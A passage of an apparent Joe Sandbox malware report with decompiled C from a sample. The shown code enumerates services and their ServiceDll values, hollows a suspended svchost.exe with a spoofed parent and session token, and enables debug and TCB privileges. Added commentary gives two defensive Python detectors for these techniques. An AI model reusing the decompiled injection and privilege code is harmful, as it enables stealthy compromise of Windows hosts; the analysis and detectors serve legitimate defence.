                                                            										_v3156 = _v3148 + 0x3e + _v3140 + _t254 + _t255 + _t256 + _t257 + _t258 + _t259 + _t261 + _t263 + _t265 + _t267 + _v3140 + _t254 + _t255 + _t256 + _t257 + _t258 + _t259 + _t261 + _t263 + _t265 + _t267;
                                                            										_t271 = LocalSize(_t443);
                                                            										_t405 = _v3156;
                                                            										if(_t271 < _t405) {
                                                            											_v3132 = LocalReAlloc(_t443, _t405, 0x42);
                                                            										}
                                                            										_t444 = _v3136;
                                                            										E0465E060(_v3132 + _v3148,  *_t444, 2 + lstrlenW( *_t444) * 2);
                                                            										_t445 = _v3148 + 2 + lstrlenW( *_t444) * 2;
                                                            										E0465E060(_v3132 + _t445, _v3136[1], 2 + lstrlenW(_v3136[1]) * 2);
                                                            										_t447 = _t445 + lstrlenW(_v3136[1]) * 2 + 2;
                                                            										E0465E060(_v3132 + _t447,  *_v3144, 2 + lstrlenW( *_v3144) * 2);
                                                            										_t295 = lstrlenW( *_v3144);
                                                            										_t408 = _v3132;
                                                            										_t448 = _t447 + _t295 * 2;
                                                            										asm("movups xmm0, [eax+0x8]");
                                                            										asm("movups [edi+ecx+0x2], xmm0");
                                                            										asm("movups xmm0, [eax+0x18]");
                                                            										asm("movups [edi+ecx+0x12], xmm0");
                                                            										 *(_t448 + _t408 + 0x22) = _v3136[0xa];
                                                            										 *((intOrPtr*)(_t448 + _t408 + 0x26)) = _v3196;
                                                            										_t449 = _t448 + 0x2a;
                                                            										E0465E060(_v3132 + _t449, _t393, 2 + lstrlenW(_t393) * 2);
                                                            										_t451 = _t449 + lstrlenW(_t393) * 2 + 2;
                                                            										E0465E060(_v3132 + _t451,  &_v528, 2 + lstrlenW( &_v528) * 2);
                                                            										_t313 = lstrlenW( &_v528);
                                                            										_t394 = _v3176;
                                                            										_t453 = _t451 + _t313 * 2 + 2;
                                                            										E0465E060(_v3132 + _t453, _t394, 2 + lstrlenW(_t394) * 2);
                                                            										_t319 = lstrlenW(_t394);
                                                            										_t395 = _v3180;
                                                            										_t455 = _t453 + _t319 * 2 + 2;
                                                            										E0465E060(_v3132 + _t455, _t395, 2 + lstrlenW(_t395) * 2);
                                                            										_t325 = lstrlenW(_t395);
                                                            										_t396 = _v3184;
                                                            										_t457 = _t455 + _t325 * 2 + 2;
                                                            										E0465E060(_v3132 + _t457, _t396, 2 + lstrlenW(_t396) * 2);
                                                            										_t459 = _t457 + lstrlenW(_t396) * 2 + 2;
                                                            										_t333 = lstrlenW( &_v1568);
                                                            										_t397 = _v3132;
                                                            										E0465E060(_t459 + _v3132,  &_v1568, 2 + _t333 * 2);
                                                            										_t461 = _t459 + lstrlenW( &_v1568) * 2 + 2;
                                                            										E0465E060(_t461 + _v3132,  &_v2088, 2 + lstrlenW( &_v2088) * 2);
                                                            										_t463 = _t461 + lstrlenW( &_v2088) * 2 + 2;
                                                            										E0465E060(_t463 + _t397,  &_v2608, 2 + lstrlenW( &_v2608) * 2);
                                                            										_t475 = _t477 + 0x84;
                                                            										_t355 = lstrlenW( &_v2608);
                                                            										_t423 =  &(_v3200[0]);
                                                            										_t390 = _v3160;
                                                            										_t402 =  &(_v3136[0xb]);
                                                            										_v3200 = _t423;
                                                            										_t225 = _t463 + (_t355 + 1) * 2;
                                                            										_v3136 = _t402;
                                                            										_v3148 = _t225;
                                                            									} while (_t423 < _v3152);
                                                            								}
                                                            								LocalReAlloc(_v3132, _t225, 0x42);
                                                            								LocalFree(_v3144);
                                                            								LocalFree(_t390);
                                                            								LocalFree(_v3208);
                                                            								CloseServiceHandle(_v3204);
                                                            								return E04655AFE(_v8 ^ _t473);
                                                            							} else {
                                                            								CloseServiceHandle(_t389);
                                                            								LocalFree(_t426);
                                                            								return E04655AFE(_v8 ^ _t473);
                                                            							}
                                                            						} else {
                                                            							CloseServiceHandle(_t389);
                                                            							return E04655AFE(_v8 ^ _t473);
                                                            						}
                                                            					} else {
                                                            						CloseServiceHandle(_t389);
                                                            						goto L3;
                                                            					}
                                                            				}
                                                            			}

                                                            APIs
                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 04642FEB
                                                            • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0464301F
                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 04643030
                                                            • LocalAlloc.KERNEL32(00000040,-0000002C), ref: 0464305B
                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 0464306A
                                                            • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,?,00000000,00000000,00000000,00000000), ref: 046430B2
                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 046430BD
                                                            • LocalFree.KERNEL32(00000000), ref: 046430C4
                                                            • LocalAlloc.KERNEL32(00000040,00019000), ref: 046430E4
                                                            • LocalAlloc.KERNEL32(00000040,00002000), ref: 04643100
                                                            • LocalAlloc.KERNEL32(00000040,00002000), ref: 0464311B
                                                            • OpenServiceW.ADVAPI32(?,00000000,00000001), ref: 04643199
                                                            • QueryServiceConfigW.ADVAPI32(00000000,00000000,00002000,00000000), ref: 046431BB
                                                            • QueryServiceConfig2W.ADVAPI32(?,00000001,?,00002000,00000000), ref: 04643230
                                                            • CloseServiceHandle.ADVAPI32(?), ref: 04643247
                                                            Strings
                                                            • SYSTEM\CurrentControlSet\Services\%s\Parameters, xrefs: 04643289
                                                            • ServiceDll, xrefs: 04643305
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Service$Local$AllocCloseHandle$EnumOpenQueryServicesStatus$ConfigConfig2FreeManager
                                                            • String ID: SYSTEM\CurrentControlSet\Services\%s\Parameters$ServiceDll
                                                            • API String ID: 703603788-2144606380
                                                            • Opcode ID: 800ad640a889de1ed9485f1983cbf1d48c520255a481ef61ecba351764c53a3a
                                                            • Instruction ID: 975194027478c12aaf90d39ab3ec4724b74071c495d7e22c8c9f13ef63eb7684
                                                            • Opcode Fuzzy Hash: 800ad640a889de1ed9485f1983cbf1d48c520255a481ef61ecba351764c53a3a
                                                            • Instruction Fuzzy Hash: 89222EB190022C9BEB25DF68DC85F9AB7B9EF84304F1042D6E509E7251EF35AA94CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
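The API list above (OpenServiceW, QueryServiceConfigW, QueryServiceConfig2W, with EnumServicesStatus in the API ID) together with the strings SYSTEM\CurrentControlSet\Services\%s\Parameters and ServiceDll shows this routine walking every installed service and reading the DLL that svchost.exe loads on its behalf; what the sample then does with that list is not visible in this section. Those same values are what a responder should audit on a suspect host. The script below is an added example, not code from the report or from the sample: it parses a reg export of the Services key offline and flags svchost-hosted services whose ServiceDll resolves outside System32. The .reg text, the service name ExampleHijacked and the expansion of %SystemRoot% to C:\Windows are constructed assumptions of this example.

```python
"""Offline audit of ServiceDll values from a `reg export` of the Services key.

Added example; not code from the Joe Sandbox report or from the sample.
Assumptions: %SystemRoot% expands to C:\\Windows, and SAMPLE_REG (including
the service name ExampleHijacked) is constructed for the demonstration.
"""
import re

SYSTEM_ROOT = r"C:\Windows"
SERVICES_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services"


def parse_reg_export(text):
    """Return {key_path: {value_name: value}} from a 'Registry Editor 5.00' export.

    REG_SZ arrives as "quoted" text with backslash escapes; REG_EXPAND_SZ and
    REG_MULTI_SZ arrive as hex(2):/hex(7): UTF-16LE byte lists that reg.exe
    wraps with ',\\' line continuations. Other types are kept as raw text.
    """
    text = re.sub(r",\\\r?\n\s*", ",", text)          # undo the line wrapping first
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        m = re.match(r'"([^"]+)"=(.*)$', line)
        if not m or current is None:
            continue
        name, raw = m.groups()
        if raw.startswith('"') and raw.endswith('"'):
            value = re.sub(r"\\(.)", r"\1", raw[1:-1])  # \\ -> \ and \" -> "
        elif raw.startswith(("hex(2):", "hex(7):")):
            data = bytes(int(b, 16) for b in raw.split(":", 1)[1].split(",") if b)
            value = data.decode("utf-16-le").rstrip("\x00")
        else:
            value = raw
        keys[current][name] = value
    return keys


def audit_services(keys):
    """Flag a ServiceDll outside System32, or one set on a non-svchost service."""
    findings = []
    for path, values in keys.items():
        if not path.lower().endswith("\\parameters") or "ServiceDll" not in values:
            continue
        svc_key = path[: -len("\\Parameters")]
        image = keys.get(svc_key, {}).get("ImagePath", "")
        group = re.search(r"-k\s+(\S+)", image, re.IGNORECASE)
        dll = re.sub(r"%systemroot%", lambda _: SYSTEM_ROOT,
                     values["ServiceDll"], flags=re.IGNORECASE)
        reasons = []
        if not dll.lower().startswith((SYSTEM_ROOT + "\\System32\\").lower()):
            reasons.append("ServiceDll outside System32")
        if "svchost.exe" not in image.lower():
            reasons.append("ServiceDll set but ImagePath is not svchost.exe")
        if reasons:
            findings.append({"service": svc_key.rsplit("\\", 1)[-1],
                             "group": group.group(1) if group else None,
                             "dll": dll, "reasons": reasons})
    return findings


def _hex2(s):
    """Emit a string as reg.exe does for REG_EXPAND_SZ (sample-construction helper)."""
    parts = [f"{b:02x}" for b in (s + "\x00").encode("utf-16-le")]
    return "hex(2):" + ",".join(parts[:24]) + ",\\\n  " + ",".join(parts[24:])


# Constructed export: one genuine-looking svchost service and one planted DLL.
SAMPLE_REG = "\n".join([
    "Windows Registry Editor Version 5.00",
    "",
    "[" + SERVICES_KEY + r"\LanmanWorkstation]",
    '"ImagePath"=' + _hex2(r"%SystemRoot%\System32\svchost.exe -k NetworkService -p"),
    '"Start"=dword:00000002',
    "",
    "[" + SERVICES_KEY + r"\LanmanWorkstation\Parameters]",
    '"ServiceDll"=' + _hex2(r"%SystemRoot%\System32\wkssvc.dll"),
    "",
    "[" + SERVICES_KEY + r"\ExampleHijacked]",
    r'"ImagePath"="C:\\Windows\\system32\\svchost.exe -k netsvcs"',
    "",
    "[" + SERVICES_KEY + r"\ExampleHijacked\Parameters]",
    r'"ServiceDll"="C:\\ProgramData\\Example\\hijack.dll"',
    "",
])

if __name__ == "__main__":
    for hit in audit_services(parse_reg_export(SAMPLE_REG)):
        print(hit)
```

On a live host, reg export HKLM\SYSTEM\CurrentControlSet\Services services.reg writes UTF-16LE with a BOM, so read it with open(path, encoding="utf-16") before passing the text in. A ServiceDll under System32 is not clean by itself, since a replaced file keeps its path; pair the listing with hashes or signature checks of the DLLs it names.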

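The decompiled function E04649910 that follows is the injector. It takes a buffer and its length in __ecx/__edx, formats "%ssvchost.exe -k WspService" on the system directory, and creates that process suspended (creation flags 0xc, which include CREATE_SUSPENDED). If it can open the process whose PID E04645CA0/E04645D40 return with PROCESS_ALL_ACCESS (0x1fffff), it attaches that handle through UpdateProcThreadAttribute as PROC_THREAD_ATTRIBUTE_PARENT_PROCESS (0x20000) and switches to flags 0x8000c (EXTENDED_STARTUPINFO_PRESENT), so the child's recorded parent is that process rather than the caller. It prefers CreateProcessAsUserW: it polls WTSEnumerateSessionsW up to ten times with Sleep(0xbb8) for a WTSActive or WTSConnected session, duplicates its own token as a primary token (0x2000000 is MAXIMUM_ALLOWED, 1 is TokenPrimary) and sets TokenSessionId (class 0xc) to that session, falling back to CreateProcessW. The child's primary thread is then hijacked: GetThreadContext with CONTEXT_FULL (0x10007), VirtualAllocEx with MEM_COMMIT|MEM_RESERVE and PAGE_EXECUTE_READWRITE (0x40), WriteProcessMemory of the buffer, Eip set to the allocation, SetThreadContext, ResumeThread; any failure ends in TerminateProcess. The listing runs on past the int3 padding into a second routine that enables SeTcbPrivilege, SeDebugPrivilege, SeIncreaseQuotaPrivilege and SeAssignPrimaryTokenPrivilege, which is the privilege set that this token hop needs. The detector below is an added example, not code from the report or from the sample; it correlates that sequence over API-call telemetry in a simplified, constructed record format. The field names (pid, api, target, flags, protect, base, size, addr, eip, reported_parent, cmdline) and every PID and address in SAMPLE_EVENTS are assumptions of this example; an EDR's hooking or kernel-callback layer would supply the real equivalent.

```python
"""Correlate the suspended-spawn thread-hijack sequence used by E04649910.

Added example; not code from the Joe Sandbox report or from the sample.
Record fields and all PIDs/addresses in SAMPLE_EVENTS are constructed.
"""
from collections import defaultdict

# Constants exactly as they appear in the listing.
CREATE_SUSPENDED = 0x4                 # part of the 0xc / 0x8000c creation flags
PAGE_EXECUTE_READWRITE = 0x40          # VirtualAllocEx(..., 0x3000, 0x40)


def _stage(ev):
    """Map one telemetry record to a step of the sequence, or None if irrelevant."""
    api = ev["api"]
    if api in ("CreateProcessW", "CreateProcessAsUserW"):
        return "create" if ev.get("flags", 0) & CREATE_SUSPENDED else None
    if api == "VirtualAllocEx":
        return "alloc" if ev.get("protect") == PAGE_EXECUTE_READWRITE else None
    return {"WriteProcessMemory": "write", "SetThreadContext": "setctx",
            "ResumeThread": "resume"}.get(api)


def detect_thread_hijack(events):
    """One finding per (caller, child) completing create->alloc->write->setctx->resume.

    Keyed on the caller PID, not on the child's parent field: with
    PROC_THREAD_ATTRIBUTE_PARENT_PROCESS the child's recorded parent is the
    process behind the supplied handle, so a parent/child rule on svchost.exe
    would look at the wrong process entirely.
    """
    state = defaultdict(dict)          # (caller, child) -> evidence gathered so far
    findings = []
    for ev in events:
        stage = _stage(ev)
        if stage is None:
            continue
        key = (ev["pid"], ev["target"])
        s = state[key]
        if stage == "create":
            state[key] = {"cmdline": ev.get("cmdline", "")}
        elif "cmdline" not in s:
            continue                   # this caller never spawned this child suspended
        elif stage == "alloc":
            s["alloc"] = (ev["base"], ev["size"])
        elif stage == "write" and "alloc" in s:
            base, size = s["alloc"]
            if base <= ev["addr"] < base + size:
                s["write"] = ev["size"]
        elif stage == "setctx" and "write" in s:
            base, size = s["alloc"]
            if base <= ev["eip"] < base + size:   # new entry point inside the RWX blob
                s["eip"] = ev["eip"]
        elif stage == "resume" and "eip" in s:
            findings.append({"caller": key[0], "child": key[1], "cmdline": s["cmdline"],
                             "entry": hex(s["eip"]), "payload_bytes": s["write"]})
            del state[key]
    return findings


def detect_ppid_spoof(events):
    """Flag creations whose recorded parent differs from the process that made the call.

    A source that logs the calling process (the process ID in an ETW event
    header, for instance) still sees the real creator; the two disagree only
    when the parent-process attribute was used.
    """
    return [(ev["pid"], ev["target"], ev["reported_parent"]) for ev in events
            if ev["api"].startswith("CreateProcess")
            and "reported_parent" in ev and ev["reported_parent"] != ev["pid"]]


# Constructed telemetry: 1234 is the injector, 5678 the svchost.exe it spawned
# suspended with a spoofed parent of 880; 4242 is a debugger working on 9000.
SAMPLE_EVENTS = [
    {"pid": 1234, "api": "CreateProcessAsUserW", "target": 5678, "flags": 0x8000c,
     "reported_parent": 880, "cmdline": r"C:\Windows\system32\svchost.exe -k WspService"},
    {"pid": 1234, "api": "VirtualAllocEx", "target": 5678, "base": 0x400000,
     "size": 0x3000, "protect": PAGE_EXECUTE_READWRITE},
    {"pid": 1234, "api": "WriteProcessMemory", "target": 5678, "addr": 0x400000, "size": 0x2c00},
    {"pid": 1234, "api": "SetThreadContext", "target": 5678, "eip": 0x400000},
    {"pid": 1234, "api": "ResumeThread", "target": 5678},
    # Benign: created suspended, one register changed, resumed; no RWX allocation or write.
    {"pid": 4242, "api": "CreateProcessW", "target": 9000, "flags": CREATE_SUSPENDED,
     "reported_parent": 4242, "cmdline": r"C:\tools\target.exe"},
    {"pid": 4242, "api": "SetThreadContext", "target": 9000, "eip": 0x77123456},
    {"pid": 4242, "api": "ResumeThread", "target": 9000},
]

if __name__ == "__main__":
    for hit in detect_thread_hijack(SAMPLE_EVENTS):
        print("thread hijack:", hit)
    for caller, child, parent in detect_ppid_spoof(SAMPLE_EVENTS):
        print(f"ppid spoof: {caller} created {child}, recorded parent is {parent}")
```

The discriminator is the write into a fresh PAGE_EXECUTE_READWRITE region of a child the caller itself created suspended, followed by Eip being moved into that region; a debugger that creates a process suspended and edits its context never allocates and fills such a region. Sysmon event 8 (CreateRemoteThread) does not fire for this technique because no remote thread is created, which is why the correlation has to run over process-creation, memory and thread-context events instead.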
                                                            C-Code - Quality: 75%
                                                            			E04649910(void* __ecx, long __edx) {
                                                            				signed int _v12;
                                                            				short _v536;
                                                            				short _v1056;
                                                            				void* _v1332;
                                                            				struct _OSVERSIONINFOW _v1336;
                                                            				struct _CONTEXT _v2056;
                                                            				long _v2060;
                                                            				void* _v2064;
                                                            				void* _v2068;
                                                            				void* _v2072;
                                                            				int _v2076;
                                                            				void* _v2080;
                                                            				void* _v2084;
                                                            				struct _PROCESS_INFORMATION _v2100;
                                                            				void* _v2104;
                                                            				void _v2108;
                                                            				long _v2112;
                                                            				void* _v2116;
                                                            				long _v2120;
                                                            				intOrPtr _v2124;
                                                            				struct _STARTUPINFOW _v2192;
                                                            				void* _v2216;
                                                            				void* _v2220;
                                                            				char _v2224;
                                                            				void* _v2228;
                                                            				char _v2232;
                                                            				long _v2236;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				signed int _t111;
                                                            				long _t119;
                                                            				signed int _t121;
                                                            				void* _t129;
                                                            				void* _t136;
                                                            				void* _t139;
                                                            				long _t140;
                                                            				_Unknown_base(*)()* _t146;
                                                            				signed int _t154;
                                                            				signed int _t155;
                                                            				_Unknown_base(*)()* _t157;
                                                            				void* _t160;
                                                            				void* _t167;
                                                            				void* _t170;
                                                            				void* _t174;
                                                            				void* _t179;
                                                            				void* _t182;
                                                            				long _t185;
                                                            				void* _t186;
                                                            				void* _t188;
                                                            				void* _t195;
                                                            				void* _t201;
                                                            				long _t202;
                                                            				void* _t211;
                                                            				intOrPtr _t218;
                                                            				void* _t225;
                                                            				void* _t226;
                                                            				long _t227;
                                                            				intOrPtr _t228;
                                                            				void* _t229;
                                                            				void* _t230;
                                                            				intOrPtr* _t231;
                                                            				void* _t238;
                                                            				intOrPtr* _t240;
                                                            				intOrPtr* _t241;
                                                            				void* _t260;
                                                            				void* _t264;
                                                            				void* _t266;
                                                            				void* _t267;
                                                            				long _t268;
                                                            				void* _t269;
                                                            				void* _t272;
                                                            				intOrPtr* _t274;
                                                            				intOrPtr* _t275;
                                                            				void* _t277;
                                                            				void* _t280;
                                                            				void* _t281;
                                                            				void* _t287;
                                                            				signed int _t290;
                                                            				void* _t292;
                                                            				signed int _t294;
                                                            				void* _t298;
                                                            				long _t303;
                                                            
                                                            				_t233 = __ecx;
                                                            				_t111 =  *0x4684008; // 0xd355be4e
                                                            				_v12 = _t111 ^ _t290;
                                                            				_v2112 = __edx;
                                                            				_v2116 = __ecx;
                                                            				E0465DEA0(_t264,  &_v2192, 0, 0x48);
                                                            				_v2192.cb = 0x48;
                                                            				_t275 = 0;
                                                            				_v2060 = 0xc;
                                                            				_v2076 = 0;
                                                            				asm("xorps xmm0, xmm0");
                                                            				_v2064 = 0;
                                                            				asm("movups [ebp-0x830], xmm0");
                                                            				_v2084 = 0;
                                                            				E0465DEA0(_t264,  &_v1336, 0, 0x114);
                                                            				_t294 = _t292 + 0x18;
                                                            				_v1336.dwOSVersionInfoSize = 0x114;
                                                            				GetVersionExW( &_v1336);
                                                            				asm("sbb ebx, ebx");
                                                            				_t226 = _t225 + 1;
                                                            				_t119 = E04645CA0(_t226, _t264, 0);
                                                            				if(_t119 == 0) {
                                                            					_t119 = E04645D40(_t264, 0);
                                                            					_t303 = _t119;
                                                            				}
                                                            				if(_t303 != 0 && _t226 != 0) {
                                                            					_t211 = OpenProcess(0x1fffff, 0, _t119);
                                                            					_v2084 = _t211;
                                                            					if(_t211 != 0) {
                                                            						_t275 = GetProcAddress(LoadLibraryA("kernel32.dll"), "InitializeProcThreadAttributeList");
                                                            						_t274 = GetProcAddress(LoadLibraryA("kernel32.dll"), "UpdateProcThreadAttribute");
                                                            						if(_t274 != 0) {
                                                            							_t307 = _t275;
                                                            							if(_t275 != 0) {
                                                            								 *_t275(0, 1, 0,  &_v2076);
                                                            								_push(_v2076);
                                                            								_t218 = L04655B55(_t233, _t275, _t307);
                                                            								_t294 = _t294 + 4;
                                                            								_v2064 = _t218;
                                                            								_push( &_v2076);
                                                            								_push(0);
                                                            								_push(1);
                                                            								_push(_t218);
                                                            								if( *_t275() == 0) {
                                                            									_push(_v2064);
                                                            									goto L12;
                                                            								} else {
                                                            									_t275 = _v2064;
                                                            									_push(0);
                                                            									_push(0);
                                                            									_push(4);
                                                            									_push( &_v2084);
                                                            									_push(0x20000);
                                                            									_push(0);
                                                            									_push(_t275);
                                                            									if( *_t274() == 0) {
                                                            										_push(_t275);
                                                            										L12:
                                                            										L04655B0F();
                                                            										_t294 = _t294 + 4;
                                                            										__eflags = 0;
                                                            										_v2064 = 0;
                                                            									} else {
                                                            										_v2124 = _t275;
                                                            										_v2060 = 0x8000c;
                                                            									}
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            				_t266 = 0;
                                                            				_t121 = GetSystemDirectoryW( &_v536, 0x104);
                                                            				if( *((short*)(_t290 + _t121 * 2 - 0x216)) == 0x5c) {
                                                            					L16:
                                                            					wsprintfW( &_v1056, L"%ssvchost.exe -k WspService",  &_v536);
                                                            					if(_t226 == 0) {
                                                            						L34:
                                                            						_t227 = _v2060;
                                                            						goto L35;
                                                            					} else {
                                                            						_v2080 = _t266;
                                                            						_v2104 = _t266;
                                                            						_t238 = GetProcAddress(LoadLibraryA("Wtsapi32.dll"), "WTSEnumerateSessionsW");
                                                            						_t229 = 0;
                                                            						_v2072 = _t238;
                                                            						while(1) {
                                                            							_push( &_v2104);
                                                            							_push( &_v2080);
                                                            							_push(1);
                                                            							_push(0);
                                                            							_push(0);
                                                            							if( *_t238() == 0) {
                                                            								break;
                                                            							}
                                                            							_t260 = _v2104;
                                                            							_t154 = 0;
                                                            							_t280 = _v2080;
                                                            							if(_t260 == 0) {
                                                            								L25:
                                                            								_t155 = 0;
                                                            								if(_t260 != 0) {
                                                            									_t240 = _t280 + 8;
                                                            									while( *_t240 != 1) {
                                                            										_t155 = _t155 + 1;
                                                            										_t240 = _t240 + 0xc;
                                                            										if(_t155 < _t260) {
                                                            											continue;
                                                            										} else {
                                                            										}
                                                            										goto L31;
                                                            									}
                                                            									_t266 =  *(_t280 + (_t155 + _t155 * 2) * 4);
                                                            								}
                                                            							} else {
                                                            								_t241 = _t280 + 8;
                                                            								while( *_t241 != 0) {
                                                            									_t154 = _t154 + 1;
                                                            									_t241 = _t241 + 0xc;
                                                            									if(_t154 < _t260) {
                                                            										continue;
                                                            									} else {
                                                            										goto L25;
                                                            									}
                                                            									goto L31;
                                                            								}
                                                            								_t266 =  *(_t280 + (_t154 + _t154 * 2) * 4);
                                                            								__eflags = _t266;
                                                            								if(_t266 == 0) {
                                                            									goto L25;
                                                            								}
                                                            							}
                                                            							L31:
                                                            							_t157 = GetProcAddress(LoadLibraryA("Wtsapi32.dll"), "WTSFreeMemory");
                                                            							 *_t157(_v2080);
                                                            							if(_t266 != 0) {
                                                            								_v2108 = _t266;
                                                            								_v2072 = 0;
                                                            								_v2068 = 0;
                                                            								_t160 = OpenProcessToken(GetCurrentProcess(), 0xb,  &_v2072);
                                                            								__eflags = _t160;
                                                            								if(_t160 != 0) {
                                                            									_t167 = DuplicateTokenEx(_v2072, 0x2000000, 0, 0, 1,  &_v2068);
                                                            									__eflags = _t167;
                                                            									if(_t167 != 0) {
                                                            										_t170 = SetTokenInformation(_v2068, 0xc,  &_v2108, 4);
                                                            										__eflags = _t170;
                                                            										if(_t170 == 0) {
                                                            											CloseHandle(_v2068);
                                                            											_v2068 = 0;
                                                            										}
                                                            									}
                                                            									CloseHandle(_v2072);
                                                            								}
                                                            								_t281 = _v2068;
                                                            								_t227 = _v2060;
                                                            								__eflags = _t281;
                                                            								if(_t281 == 0) {
                                                            									goto L35;
                                                            								} else {
                                                            									_t267 = CreateProcessAsUserW(_t281, 0,  &_v1056, 0, 0, 0, _t227, 0, 0,  &_v2192,  &_v2100);
                                                            									CloseHandle(_t281);
                                                            									__eflags = _t267;
                                                            									if(_t267 == 0) {
                                                            										L35:
                                                            										_t267 = CreateProcessW(0,  &_v1056, 0, 0, 0, _t227, 0, 0,  &_v2192,  &_v2100);
                                                            									}
                                                            								}
                                                            							} else {
                                                            								Sleep(0xbb8);
                                                            								_t238 = _v2072;
                                                            								_t229 = _t229 + 1;
                                                            								if(_t229 < 0xa) {
                                                            									continue;
                                                            								} else {
                                                            									break;
                                                            								}
                                                            							}
                                                            							goto L36;
                                                            						}
                                                            						goto L34;
                                                            					}
                                                            					L36:
                                                            					_t228 = _v2064;
                                                            					if(_t228 != 0) {
                                                            						_t146 = GetProcAddress(LoadLibraryA("kernel32.dll"), "DeleteProcThreadAttributeList");
                                                            						if(_t146 != 0) {
                                                            							 *_t146(_t228);
                                                            						}
                                                            						_push(1);
                                                            						E04655B47(_t228);
                                                            					}
                                                            					_t129 = _v2084;
                                                            					if(_t129 != 0) {
                                                            						CloseHandle(_t129);
                                                            					}
                                                            					if(_t267 == 0) {
                                                            						L46:
                                                            						return E04655AFE(_v12 ^ _t290);
                                                            					} else {
                                                            						_v2056.ContextFlags = 0x10007;
                                                            						if(GetThreadContext(_v2100.hThread,  &_v2056) == 0) {
                                                            							goto L46;
                                                            						} else {
                                                            							_t268 = _v2112;
                                                            							_t277 = VirtualAllocEx(_v2100.hProcess, 0, _t268, 0x3000, 0x40);
                                                            							if(_t277 != 0) {
                                                            								_t136 = WriteProcessMemory(_v2100.hProcess, _t277, _v2116, _t268,  &_v2120);
                                                            								__eflags = _t136;
                                                            								if(_t136 == 0) {
                                                            									goto L45;
                                                            								} else {
                                                            									_v2056.Eip = _t277;
                                                            									_t139 = SetThreadContext(_v2100.hThread,  &_v2056);
                                                            									__eflags = _t139;
                                                            									if(_t139 == 0) {
                                                            										goto L45;
                                                            									} else {
                                                            										_t140 = ResumeThread(_v2100.hThread);
                                                            										__eflags = _t140 - 0xffffffff;
                                                            										if(_t140 == 0xffffffff) {
                                                            											goto L45;
                                                            										} else {
                                                            											CloseHandle(_v2100.hThread);
                                                            											__eflags = _v12 ^ _t290;
                                                            											return E04655AFE(_v12 ^ _t290);
                                                            										}
                                                            									}
                                                            								}
                                                            							} else {
                                                            								L45:
                                                            								TerminateProcess(_v2100, 0);
                                                            								goto L46;
                                                            							}
                                                            						}
                                                            					}
                                                            				} else {
                                                            					 *((short*)(_t290 + _t121 * 2 - 0x214)) = 0x5c;
                                                            					_t174 = 2 + _t121 * 2;
                                                            					if(_t174 >= 0x208) {
                                                            						E04655FD9();
                                                            						asm("int3");
                                                            						asm("int3");
                                                            						asm("int3");
                                                            						asm("int3");
                                                            						asm("int3");
                                                            						asm("int3");
                                                            						asm("int3");
                                                            						asm("int3");
                                                            						asm("int3");
                                                            						asm("int3");
                                                            						_push(_t290);
                                                            						_t298 = (_t294 & 0xfffffff8) - 0x14;
                                                            						_push(_t226);
                                                            						_push(_t275);
                                                            						_push(0);
                                                            						_t269 = E0464ADD0(L"SeTcbPrivilege", _t275);
                                                            						_t286 = E0464ADD0(L"SeDebugPrivilege", _t275);
                                                            						_t230 = E0464AC90(L"SeIncreaseQuotaPrivilege", _t269, _t286);
                                                            						_t179 = E0464AC90(L"SeAssignPrimaryTokenPrivilege", _t269, _t286);
                                                            						__eflags = _t179;
                                                            						_t180 = Sleep;
                                                            						if(_t179 == 0) {
                                                            							Sleep(0x1388);
                                                            							_t180 = Sleep;
                                                            						}
                                                            						__eflags = _t230;
                                                            						if(_t230 == 0) {
                                                            							 *_t180(0xbb8);
                                                            						}
                                                            						_t231 = Sleep;
                                                            						__eflags = _t269;
                                                            						if(_t269 == 0) {
                                                            							Sleep(0x1388);
                                                            						}
                                                            						__eflags = _t286;
                                                            						if(__eflags == 0) {
                                                            							Sleep(0x1388);
                                                            						}
                                                            						_v2216 = 0;
                                                            						_v2220 = 0;
                                                            						L04649390(_t231,  &_v2224, _t269, _t286, __eflags, L"Dispatch");
                                                            						__eflags = _v2228;
                                                            						_t270 = CloseHandle;
                                                            						if(_v2228 != 0) {
                                                            							L82:
                                                            							_t287 = 0;
                                                            							__eflags = 0;
                                                            						} else {
                                                            							__eflags = _v2220;
                                                            							_t232 = WaitForSingleObject;
                                                            							if(__eflags == 0) {
                                                            								goto L87;
                                                            							} else {
                                                            								_t202 = E046494D0(WaitForSingleObject, L"Dispatch", CloseHandle, _t286, __eflags);
                                                            								__eflags = _t202;
                                                            								if(__eflags == 0) {
                                                            									goto L87;
                                                            								} else {
                                                            									while(1) {
                                                            										__eflags = _t202 - 0x2fffffff;
                                                            										if(_t202 == 0x2fffffff) {
                                                            											break;
                                                            										}
                                                            										__eflags = _t202 - 0x1fffffff;
                                                            										if(_t202 == 0x1fffffff) {
                                                            											break;
                                                            										} else {
                                                            											_t286 = OpenThread(0x1fffff, 0, _t202);
                                                            											__eflags = _t286;
                                                            											if(__eflags == 0) {
                                                            												goto L87;
                                                            											} else {
                                                            												WaitForSingleObject(_t286, 0xffffffff);
                                                            												__eflags = GetExitCodeThread(_t286,  &_v2236);
                                                            												if(__eflags == 0) {
                                                            													L78:
                                                            													__eflags = L04649390(_t232,  &_v2232, _t270, _t286, __eflags, L"Dispatch");
                                                            													if(__eflags != 0) {
                                                            														goto L87;
                                                            													} else {
                                                            														_t202 = E046494D0(_t232, L"Dispatch", _t270, _t286, __eflags);
                                                            														__eflags = _t202;
                                                            														if(__eflags != 0) {
                                                            															continue;
